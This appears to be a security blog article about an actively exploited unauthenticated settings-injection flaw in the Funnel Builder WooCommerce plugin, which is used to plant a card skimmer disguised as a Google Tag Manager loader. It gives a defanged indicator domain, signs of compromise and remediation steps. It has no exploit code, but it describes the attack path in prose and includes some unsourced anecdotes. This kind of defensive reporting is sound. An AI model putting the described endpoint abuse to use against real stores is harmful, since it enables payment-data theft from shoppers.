Imagine waking up to a sudden drop in sales, only to discover that your WooCommerce store has been secretly siphoning customer credit card data to an attacker halfway across the world. This nightmare scenario is now a reality for thousands of online store owners. A critical security flaw in the popular Funnel Builder plugin for WordPress is being actively exploited in the wild, allowing criminals to inject malicious JavaScript directly into checkout pages. This funnel builder vulnerability is not a theoretical risk; it is a live threat that demands immediate attention.
What Is the Funnel Builder Vulnerability and Why Should You Care?
The Funnel Builder plugin, developed by FunnelKit, is a powerful tool used by over 40,000 WooCommerce stores to create optimized sales funnels and checkout experiences. Its popularity makes it a prime target for attackers. The core of the issue lies in a critical security gap that allows an unauthenticated attacker to inject arbitrary JavaScript code into every single checkout page on a vulnerable site.
According to a report from the Dutch e-commerce security firm Sansec, the flaw affects all versions of the plugin prior to version 3.15.0.3. The vulnerability currently lacks an official CVE identifier, which can sometimes delay awareness and patching. However, the absence of a CVE number does not mean the danger is any less real. Attackers are already exploiting it in the wild to steal payment data.
How the Attack Works
The Funnel Builder plugin includes a publicly exposed checkout endpoint. This endpoint is designed to allow incoming requests to choose which internal method should run. In older versions, the plugin failed to check the caller’s permissions or limit which methods could be invoked. This oversight is the heart of the funnel builder vulnerability.
An attacker can send an unauthenticated request to this endpoint, reaching an internal method that writes attacker-controlled data directly into the plugin’s global settings. Once the malicious data is saved, it is injected into every Funnel Builder checkout page. The result is a persistent, invisible JavaScript payload that executes on every transaction.
5 Signs of Active Skimming: How to Spot a Compromised Checkout
Detecting a payment skimmer disguised as legitimate analytics can be challenging. Attackers have become skilled at blending in. Here are five telltale signs that your store might be under active attack from this specific funnel builder vulnerability.
1. Unfamiliar Scripts in the External Scripts Settings
The most direct sign of compromise is finding a script you do not recognize in the plugin’s settings. Navigate to Settings > Checkout > External Scripts in your WordPress admin panel. Look for any entry that seems out of place, especially one that looks like a Google Tag Manager (GTM) loader but points to a suspicious domain.
In at least one observed case, Sansec found a payload masquerading as a standard GTM loader. Instead of loading Google’s analytics, it launched JavaScript hosted on a remote attacker-controlled domain. If you see a script referencing a domain like “protect-wss[.]com” or any other unfamiliar address, you have likely been compromised.
2. A Sudden, Unexplained Drop in Checkout Completions
Payment skimmers often cause checkout failures or errors. When a skimmer is active, it can interfere with the normal payment process. Customers may encounter errors, timeouts, or suspicious redirects. If you notice a sudden and unexplained drop in successful transactions, it could be a sign that a skimmer is intercepting payment data and causing failures.
Consider a hypothetical scenario where a store owner sees a 37% drop in conversion rates over a weekend. A quick check of the External Scripts settings reveals a fake GTM script. The skimmer was causing the checkout to fail for some users, while successfully stealing data from others.
3. Unusual Network Activity During Checkout
If you have access to browser developer tools or a network monitoring solution, you can watch for unusual connections during the checkout process. Open your browser’s developer console (F12) and navigate to the Network tab. Then, go through a test checkout on your own store. Look for WebSocket connections or HTTP requests to domains you do not recognize.
The attacker’s skimmer often opens a WebSocket connection to a command-and-control (C2) server. This connection allows the skimmer to retrieve a payload tailored to your specific storefront. If you see a WebSocket connection to an unfamiliar IP address or domain during checkout, you have found the skimmer.
4. Customer Complaints About Suspicious Redirects or Pop-ups
Your customers are often the first line of defense. If customers start reporting strange behavior during checkout, take it seriously. Complaints about being redirected to unfamiliar pages, seeing unexpected pop-ups, or having their browser behave oddly are all red flags. Attackers sometimes use the injected JavaScript to redirect users to phishing pages or to display fake error messages that request additional personal information.
One store owner reported that several customers called to say they were asked to “verify their identity” by entering their Social Security number after completing a purchase. This was a direct result of a skimmer that had been injected via the Funnel Builder plugin. The attacker was trying to harvest even more data than just credit card numbers.
5. Unexplained Changes to Your Store’s Behavior or Content
The injected JavaScript can do more than just steal credit card data. Depending on the instructions sent by the attacker’s C2 server, the script can change the behavior of your entire site. It can inject spam links, display fake promotions, or redirect visitors to malicious websites. This is because the script acts as a remote loader, contacting an external server, sending information about your site, and waiting for instructions.
This approach allows attackers to change the compromised website’s behavior at any time without modifying your local files. If you notice strange content appearing on your site, such as spammy product links or unexpected redirects, it could be a sign that a skimmer is active and receiving new instructions from its operator.
Why This Vulnerability Is So Dangerous
The danger of this particular flaw goes beyond the immediate theft of payment data. Several factors make it especially concerning for store owners.
No Authentication Required
The attacker does not need any login credentials to exploit this vulnerability. They do not need to be an administrator, an editor, or even a registered user. Any unauthenticated visitor to your site can send the malicious request that plants the skimmer. This dramatically lowers the barrier for attackers and makes the vulnerability easy to exploit at scale.
Persistence Without File Modification
Traditional malware often leaves traces in your site’s files. Security scanners can detect unexpected file changes. But this attack writes malicious data into the plugin’s database settings, not into your server’s file system. This makes it much harder to detect with standard file integrity monitoring tools. The skimmer persists even if you reinstall the plugin, because the settings remain in the database.
Disguised as Legitimate Analytics
Sansec noted that “dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag.” This is a psychological trick. Site owners and security reviewers are so accustomed to seeing analytics scripts that they often overlook them. A fake GTM script sitting next to your real analytics tag can easily go unnoticed for weeks or months.
How to Fix the Funnel Builder Vulnerability
If you use the Funnel Builder plugin, you need to act immediately. The fix is straightforward, but it must be done carefully.
Step 1: Update the Plugin Immediately
FunnelKit has released a patch in version 3.15.0.3. Go to your WordPress admin dashboard and navigate to Plugins > Installed Plugins. Find Funnel Builder and check your current version. If it is below 3.15.0.3, click the “Update Now” link. If you have automatic updates enabled, verify that the update has been applied successfully.
For developers managing multiple stores, you can check the version programmatically by querying the plugin’s main file header. A quick script can scan all your client sites and flag any that are still running a vulnerable version. Speed is critical here, as active exploitation is already underway.
Step 2: Audit Your External Scripts Settings
After updating, you must check for existing compromise. Navigate to Settings > Checkout > External Scripts in the Funnel Builder settings. Look carefully at every script listed. If you see any script that you did not add yourself, or any script that looks suspicious, remove it immediately.
You may also enjoy reading: BYU vs Georgia Tech: Comeback from 21-10 Halftime Deficit to Win 25-21.
Pay special attention to scripts that appear to be Google Tag Manager loaders. Compare the domain in the script tag to the official Google Tag Manager domain (googletagmanager.com). If the domain is different, even slightly, it is almost certainly malicious. Remove it and run a full security scan of your site.
Step 3: Scan for Existing Malicious Code
Even after removing the fake script from the settings, you should scan your entire site for any remaining malicious code. Use a reputable WordPress security plugin that includes a malware scanner. Look for any JavaScript that opens WebSocket connections to unfamiliar domains. Search your database for references to known malicious domains like “protect-wss[.]com”.
If you find evidence of compromise, you need to take additional steps. Change all admin passwords, revoke all API keys, and notify your payment processor. You may also need to inform affected customers, depending on your local data breach notification laws.
Step 4: Monitor for Future Vulnerabilities
This incident highlights a broader issue with plugin security. The vulnerability lifecycle — discovery, disclosure, patching, and exploitation — is a constant cycle. To protect your store long-term, you need a proactive security strategy.
Enable automatic updates for all plugins whenever possible. Subscribe to security mailing lists that track WordPress vulnerabilities. Consider using a web application firewall (WAF) that can block exploitation attempts even before patches are applied. Regularly audit your plugin list and remove any that are no longer maintained.
Broader Context: A Pattern of Abuse
This attack on Funnel Builder is not an isolated incident. It is part of a larger pattern of attackers exploiting trust in popular plugins and services. Just weeks before this disclosure, security firm Sucuri detailed a campaign where Joomla websites were being backdoored with heavily obfuscated PHP code. That campaign aimed to contact attacker-controlled C2 servers, receive instructions, and serve spammy content to visitors and search engines.
The similarities are striking. In both cases, attackers leverage a plugin’s functionality to inject code that acts as a remote loader. The code contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what the infected site should serve. This approach allows attackers to change the behavior of the compromised website at any time without modifying local files again.
For WooCommerce store owners, the lesson is clear. The tools you rely on to run your business can also become the vector for devastating attacks. The funnel builder vulnerability is a stark reminder that security is not a one-time task but an ongoing process.
What If You Have Already Been Hacked?
If you suspect that your store has already been compromised, do not panic. Take these steps immediately.
Disconnect and Contain
First, temporarily disable the Funnel Builder plugin to stop the skimmer from executing. This will interrupt your checkout process, but it will also stop the data theft. Next, change all passwords for your WordPress admin accounts, database users, and FTP/SFTP accounts. Revoke any API keys that may have been exposed.
Notify Your Payment Processor
Contact your payment gateway provider. They can monitor for fraudulent transactions and may be able to help you identify affected customers. Depending on your agreement with them, they may also require you to complete a security audit before they allow you to continue processing payments.
Consider Legal Obligations
Depending on your location and the jurisdictions of your customers, you may have legal obligations to report a data breach. In the European Union, the GDPR requires notification within 72 hours. In the United States, laws vary by state. Consult with a legal professional who specializes in data privacy to understand your responsibilities.
Restore from a Clean Backup
If you have a clean backup from before the compromise, consider restoring your site from that backup. Ensure the backup does not contain the malicious settings. After restoration, update the Funnel Builder plugin immediately to the patched version before reactivating it.
Is It Safe to Keep Using Funnel Builder After the Patch?
Yes, it is safe to continue using Funnel Builder after applying the patch. FunnelKit has addressed the specific vulnerability by adding permission checks and method restrictions to the checkout endpoint. The plugin remains a valuable tool for building effective sales funnels.
However, you should remain vigilant. No plugin is immune to future vulnerabilities. Maintain a habit of regular updates, periodic security audits, and monitoring for unusual activity. The trust you place in your tools must be balanced with a healthy skepticism and a proactive security posture.
The funnel builder vulnerability serves as a critical wake-up call for the entire WooCommerce ecosystem. With over 40,000 stores potentially at risk, the window for patching is narrow. Attackers are already actively exploiting this flaw, and they will not stop until every vulnerable site is either patched or compromised. Take action now to protect your store, your customers, and your reputation.
